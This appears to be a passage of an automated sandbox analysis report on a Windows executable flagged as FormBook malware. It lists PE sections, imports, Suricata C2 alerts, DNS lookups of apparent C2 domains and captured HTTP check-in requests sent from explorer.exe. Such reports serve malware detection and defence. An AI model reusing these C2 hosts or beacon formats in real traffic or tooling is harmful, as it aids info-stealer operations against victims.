          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0xc80000x472380x47400f59eb3c128183326e45be13d8a8890a1False0.9069764254385965data7.847645808433948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x1100000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
          RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
          RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
          RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
          RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
          RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
          RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
          RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
          RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
          RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
          RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
          RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
          RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
          RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
          RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
          RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
          RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
          RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
          RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
          RT_RCDATA0xd07b80x3e4cedata1.0003370143662171
          RT_GROUP_ICON0x10ec880x76dataEnglishGreat Britain0.6610169491525424
          RT_GROUP_ICON0x10ed000x14dataEnglishGreat Britain1.25
          RT_GROUP_ICON0x10ed140x14dataEnglishGreat Britain1.15
          RT_GROUP_ICON0x10ed280x14dataEnglishGreat Britain1.25
          RT_VERSION0x10ed3c0x10cdataEnglishGreat Britain0.5932835820895522
          RT_MANIFEST0x10ee480x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

          Imports

          DLLImport
          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
          PSAPI.DLLGetProcessMemoryInfo
          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
          UxTheme.dllIsThemeActive
          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishGreat Britain

          Network Behavior

          Suricata IDS Alerts

          TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
          2024-08-27T10:51:57.291670+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)14973780192.168.2.4104.18.24.121
          2024-08-27T10:51:57.291670+0200TCP2031449ET MALWARE FormBook CnC Checkin (GET)14973780192.168.2.4104.18.24.121
          2024-08-27T10:51:57.291670+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)14973780192.168.2.4104.18.24.121
          2024-08-27T10:53:20.668970+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)14973880192.168.2.4103.235.46.96
          2024-08-27T10:53:20.668970+0200TCP2031449ET MALWARE FormBook CnC Checkin (GET)14973880192.168.2.4103.235.46.96
          2024-08-27T10:53:20.668970+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)14973880192.168.2.4103.235.46.96
          2024-08-27T10:50:53.816844+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)14973980192.168.2.476.223.105.230
          2024-08-27T10:50:53.816844+0200TCP2031449ET MALWARE FormBook CnC Checkin (GET)14973980192.168.2.476.223.105.230
          2024-08-27T10:50:53.816844+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)14973980192.168.2.476.223.105.230
          2024-08-27T10:54:21.642054+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)14974180192.168.2.4104.18.23.89
          2024-08-27T10:54:21.642054+0200TCP2031449ET MALWARE FormBook CnC Checkin (GET)14974180192.168.2.4104.18.23.89
          2024-08-27T10:54:21.642054+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)14974180192.168.2.4104.18.23.89
          2024-08-27T10:54:01.377326+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)14974080192.168.2.4103.224.212.214
          2024-08-27T10:54:01.377326+0200TCP2031449ET MALWARE FormBook CnC Checkin (GET)14974080192.168.2.4103.224.212.214
          2024-08-27T10:54:01.377326+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)14974080192.168.2.4103.224.212.214

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 27, 2024 10:51:56.787992954 CEST4973780192.168.2.4104.18.24.121
          Aug 27, 2024 10:51:56.792905092 CEST8049737104.18.24.121192.168.2.4
          Aug 27, 2024 10:51:56.792974949 CEST4973780192.168.2.4104.18.24.121
          Aug 27, 2024 10:51:56.793009996 CEST4973780192.168.2.4104.18.24.121
          Aug 27, 2024 10:51:56.797885895 CEST8049737104.18.24.121192.168.2.4
          Aug 27, 2024 10:51:57.285860062 CEST4973780192.168.2.4104.18.24.121
          Aug 27, 2024 10:51:57.291254997 CEST8049737104.18.24.121192.168.2.4
          Aug 27, 2024 10:51:57.291670084 CEST4973780192.168.2.4104.18.24.121
          Aug 27, 2024 10:53:20.093580008 CEST4973880192.168.2.4103.235.46.96
          Aug 27, 2024 10:53:20.098499060 CEST8049738103.235.46.96192.168.2.4
          Aug 27, 2024 10:53:20.098558903 CEST4973880192.168.2.4103.235.46.96
          Aug 27, 2024 10:53:20.098675966 CEST4973880192.168.2.4103.235.46.96
          Aug 27, 2024 10:53:20.103538036 CEST8049738103.235.46.96192.168.2.4
          Aug 27, 2024 10:53:20.598337889 CEST4973880192.168.2.4103.235.46.96
          Aug 27, 2024 10:53:20.645245075 CEST8049738103.235.46.96192.168.2.4
          Aug 27, 2024 10:53:20.663753986 CEST8049738103.235.46.96192.168.2.4
          Aug 27, 2024 10:53:20.668970108 CEST4973880192.168.2.4103.235.46.96
          Aug 27, 2024 10:53:39.702976942 CEST4973980192.168.2.476.223.105.230
          Aug 27, 2024 10:53:39.707993031 CEST804973976.223.105.230192.168.2.4
          Aug 27, 2024 10:53:39.708056927 CEST4973980192.168.2.476.223.105.230
          Aug 27, 2024 10:53:39.708156109 CEST4973980192.168.2.476.223.105.230
          Aug 27, 2024 10:53:39.712901115 CEST804973976.223.105.230192.168.2.4
          Aug 27, 2024 10:53:40.200354099 CEST804973976.223.105.230192.168.2.4
          Aug 27, 2024 10:53:40.200377941 CEST804973976.223.105.230192.168.2.4
          Aug 27, 2024 10:53:40.200530052 CEST4973980192.168.2.476.223.105.230
          Aug 27, 2024 10:53:40.200530052 CEST4973980192.168.2.476.223.105.230
          Aug 27, 2024 10:53:40.205528021 CEST804973976.223.105.230192.168.2.4
          Aug 27, 2024 10:54:00.857664108 CEST4974080192.168.2.4103.224.212.214
          Aug 27, 2024 10:54:00.862688065 CEST8049740103.224.212.214192.168.2.4
          Aug 27, 2024 10:54:00.865820885 CEST4974080192.168.2.4103.224.212.214
          Aug 27, 2024 10:54:00.865820885 CEST4974080192.168.2.4103.224.212.214
          Aug 27, 2024 10:54:00.870647907 CEST8049740103.224.212.214192.168.2.4
          Aug 27, 2024 10:54:01.369164944 CEST4974080192.168.2.4103.224.212.214
          Aug 27, 2024 10:54:01.377259016 CEST8049740103.224.212.214192.168.2.4
          Aug 27, 2024 10:54:01.377326012 CEST4974080192.168.2.4103.224.212.214
          Aug 27, 2024 10:54:21.149645090 CEST4974180192.168.2.4104.18.23.89
          Aug 27, 2024 10:54:21.154572010 CEST8049741104.18.23.89192.168.2.4
          Aug 27, 2024 10:54:21.155150890 CEST4974180192.168.2.4104.18.23.89
          Aug 27, 2024 10:54:21.155150890 CEST4974180192.168.2.4104.18.23.89
          Aug 27, 2024 10:54:21.160027981 CEST8049741104.18.23.89192.168.2.4
          Aug 27, 2024 10:54:21.640928030 CEST8049741104.18.23.89192.168.2.4
          Aug 27, 2024 10:54:21.641071081 CEST4974180192.168.2.4104.18.23.89
          Aug 27, 2024 10:54:21.642009974 CEST8049741104.18.23.89192.168.2.4
          Aug 27, 2024 10:54:21.642054081 CEST4974180192.168.2.4104.18.23.89
          Aug 27, 2024 10:54:21.645853996 CEST8049741104.18.23.89192.168.2.4

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 27, 2024 10:51:36.521224022 CEST5070753192.168.2.41.1.1.1
          Aug 27, 2024 10:51:36.535761118 CEST53507071.1.1.1192.168.2.4
          Aug 27, 2024 10:51:56.286258936 CEST6095753192.168.2.41.1.1.1
          Aug 27, 2024 10:51:56.787256002 CEST53609571.1.1.1192.168.2.4
          Aug 27, 2024 10:52:16.130374908 CEST5700553192.168.2.41.1.1.1
          Aug 27, 2024 10:52:16.175584078 CEST53570051.1.1.1192.168.2.4
          Aug 27, 2024 10:52:57.505567074 CEST6027853192.168.2.41.1.1.1
          Aug 27, 2024 10:52:58.423975945 CEST53602781.1.1.1192.168.2.4
          Aug 27, 2024 10:53:18.743730068 CEST5143053192.168.2.41.1.1.1
          Aug 27, 2024 10:53:19.739533901 CEST5143053192.168.2.41.1.1.1
          Aug 27, 2024 10:53:20.092719078 CEST53514301.1.1.1192.168.2.4
          Aug 27, 2024 10:53:20.092770100 CEST53514301.1.1.1192.168.2.4
          Aug 27, 2024 10:53:39.576560020 CEST4970953192.168.2.41.1.1.1
          Aug 27, 2024 10:53:39.616714954 CEST53497091.1.1.1192.168.2.4
          Aug 27, 2024 10:54:00.539650917 CEST5075253192.168.2.41.1.1.1
          Aug 27, 2024 10:54:00.849344015 CEST53507521.1.1.1192.168.2.4
          Aug 27, 2024 10:54:21.081135035 CEST5853753192.168.2.41.1.1.1
          Aug 27, 2024 10:54:21.148845911 CEST53585371.1.1.1192.168.2.4
          Aug 27, 2024 10:54:41.646626949 CEST6293953192.168.2.41.1.1.1
          Aug 27, 2024 10:54:42.681559086 CEST6293953192.168.2.41.1.1.1
          Aug 27, 2024 10:54:43.676889896 CEST6293953192.168.2.41.1.1.1
          Aug 27, 2024 10:54:45.717423916 CEST6293953192.168.2.41.1.1.1
          Aug 27, 2024 10:54:47.667015076 CEST53629391.1.1.1192.168.2.4
          Aug 27, 2024 10:54:47.667025089 CEST53629391.1.1.1192.168.2.4
          Aug 27, 2024 10:54:47.667038918 CEST53629391.1.1.1192.168.2.4
          Aug 27, 2024 10:54:47.667048931 CEST53629391.1.1.1192.168.2.4
          Aug 27, 2024 10:55:02.475862026 CEST5200653192.168.2.41.1.1.1
          Aug 27, 2024 10:55:02.490444899 CEST53520061.1.1.1192.168.2.4

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Aug 27, 2024 10:51:36.521224022 CEST192.168.2.41.1.1.10xb591Standard query (0)www.strategiclogisticsagency.comA (IP address)IN (0x0001)false
          Aug 27, 2024 10:51:56.286258936 CEST192.168.2.41.1.1.10x109eStandard query (0)www.arlatwestern.shopA (IP address)IN (0x0001)false
          Aug 27, 2024 10:52:16.130374908 CEST192.168.2.41.1.1.10xc10Standard query (0)www.betbox2341.comA (IP address)IN (0x0001)false
          Aug 27, 2024 10:52:57.505567074 CEST192.168.2.41.1.1.10xabe4Standard query (0)www.af28.topA (IP address)IN (0x0001)false
          Aug 27, 2024 10:53:18.743730068 CEST192.168.2.41.1.1.10x6b5fStandard query (0)www.wvufcw948o.topA (IP address)IN (0x0001)false
          Aug 27, 2024 10:53:19.739533901 CEST192.168.2.41.1.1.10x6b5fStandard query (0)www.wvufcw948o.topA (IP address)IN (0x0001)false
          Aug 27, 2024 10:53:39.576560020 CEST192.168.2.41.1.1.10xfd8fStandard query (0)www.wheresthechocolateat.comA (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:00.539650917 CEST192.168.2.41.1.1.10x1e34Standard query (0)www.serverdayz.comA (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:21.081135035 CEST192.168.2.41.1.1.10xd47Standard query (0)www.theselflovesite.comA (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:41.646626949 CEST192.168.2.41.1.1.10x27c7Standard query (0)www.iiixc759q.xyzA (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:42.681559086 CEST192.168.2.41.1.1.10x27c7Standard query (0)www.iiixc759q.xyzA (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:43.676889896 CEST192.168.2.41.1.1.10x27c7Standard query (0)www.iiixc759q.xyzA (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:45.717423916 CEST192.168.2.41.1.1.10x27c7Standard query (0)www.iiixc759q.xyzA (IP address)IN (0x0001)false
          Aug 27, 2024 10:55:02.475862026 CEST192.168.2.41.1.1.10xf539Standard query (0)www.sliveringaf.christmasA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Aug 27, 2024 10:51:36.535761118 CEST1.1.1.1192.168.2.40xb591Name error (3)www.strategiclogisticsagency.comnonenoneA (IP address)IN (0x0001)false
          Aug 27, 2024 10:51:56.787256002 CEST1.1.1.1192.168.2.40x109eNo error (0)www.arlatwestern.shop104.18.24.121A (IP address)IN (0x0001)false
          Aug 27, 2024 10:52:16.175584078 CEST1.1.1.1192.168.2.40xc10Server failure (2)www.betbox2341.comnonenoneA (IP address)IN (0x0001)false
          Aug 27, 2024 10:53:20.092719078 CEST1.1.1.1192.168.2.40x6b5fNo error (0)www.wvufcw948o.topwww.baidu.comCNAME (Canonical name)IN (0x0001)false
          Aug 27, 2024 10:53:20.092719078 CEST1.1.1.1192.168.2.40x6b5fNo error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
          Aug 27, 2024 10:53:20.092719078 CEST1.1.1.1192.168.2.40x6b5fNo error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
          Aug 27, 2024 10:53:20.092719078 CEST1.1.1.1192.168.2.40x6b5fNo error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
          Aug 27, 2024 10:53:20.092719078 CEST1.1.1.1192.168.2.40x6b5fNo error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
          Aug 27, 2024 10:53:20.092770100 CEST1.1.1.1192.168.2.40x6b5fNo error (0)www.wvufcw948o.topwww.baidu.comCNAME (Canonical name)IN (0x0001)false
          Aug 27, 2024 10:53:20.092770100 CEST1.1.1.1192.168.2.40x6b5fNo error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
          Aug 27, 2024 10:53:20.092770100 CEST1.1.1.1192.168.2.40x6b5fNo error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
          Aug 27, 2024 10:53:20.092770100 CEST1.1.1.1192.168.2.40x6b5fNo error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
          Aug 27, 2024 10:53:20.092770100 CEST1.1.1.1192.168.2.40x6b5fNo error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
          Aug 27, 2024 10:53:39.616714954 CEST1.1.1.1192.168.2.40xfd8fNo error (0)www.wheresthechocolateat.comwheresthechocolateat.comCNAME (Canonical name)IN (0x0001)false
          Aug 27, 2024 10:53:39.616714954 CEST1.1.1.1192.168.2.40xfd8fNo error (0)wheresthechocolateat.com76.223.105.230A (IP address)IN (0x0001)false
          Aug 27, 2024 10:53:39.616714954 CEST1.1.1.1192.168.2.40xfd8fNo error (0)wheresthechocolateat.com13.248.243.5A (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:00.849344015 CEST1.1.1.1192.168.2.40x1e34No error (0)www.serverdayz.com103.224.212.214A (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:21.148845911 CEST1.1.1.1192.168.2.40xd47No error (0)www.theselflovesite.comsites.ludicrous.cloudCNAME (Canonical name)IN (0x0001)false
          Aug 27, 2024 10:54:21.148845911 CEST1.1.1.1192.168.2.40xd47No error (0)sites.ludicrous.cloud104.18.23.89A (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:21.148845911 CEST1.1.1.1192.168.2.40xd47No error (0)sites.ludicrous.cloud104.18.22.89A (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:47.667015076 CEST1.1.1.1192.168.2.40x27c7Server failure (2)www.iiixc759q.xyznonenoneA (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:47.667025089 CEST1.1.1.1192.168.2.40x27c7Server failure (2)www.iiixc759q.xyznonenoneA (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:47.667038918 CEST1.1.1.1192.168.2.40x27c7Server failure (2)www.iiixc759q.xyznonenoneA (IP address)IN (0x0001)false
          Aug 27, 2024 10:54:47.667048931 CEST1.1.1.1192.168.2.40x27c7Server failure (2)www.iiixc759q.xyznonenoneA (IP address)IN (0x0001)false
          Aug 27, 2024 10:55:02.490444899 CEST1.1.1.1192.168.2.40xf539Name error (3)www.sliveringaf.christmasnonenoneA (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • www.arlatwestern.shop
          • www.wvufcw948o.top
          • www.wheresthechocolateat.com
          • www.serverdayz.com
          • www.theselflovesite.com

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.449737104.18.24.121802580C:\Windows\explorer.exe
          TimestampBytes transferredDirectionData
          Aug 27, 2024 10:51:56.793009996 CEST162OUTGET /pt46/?ara=0RpqK4N+sKWumQPIkFOTbgKQJXSBpFKqwGjlCYY5Ihaqw+DawbshP/fsCF3RmMSwrLNm&D8V=_FNDAz HTTP/1.1
          Host: www.arlatwestern.shop
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.449738103.235.46.96802580C:\Windows\explorer.exe
          TimestampBytes transferredDirectionData
          Aug 27, 2024 10:53:20.098675966 CEST159OUTGET /pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAz HTTP/1.1
          Host: www.wvufcw948o.top
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.44973976.223.105.230802580C:\Windows\explorer.exe
          TimestampBytes transferredDirectionData
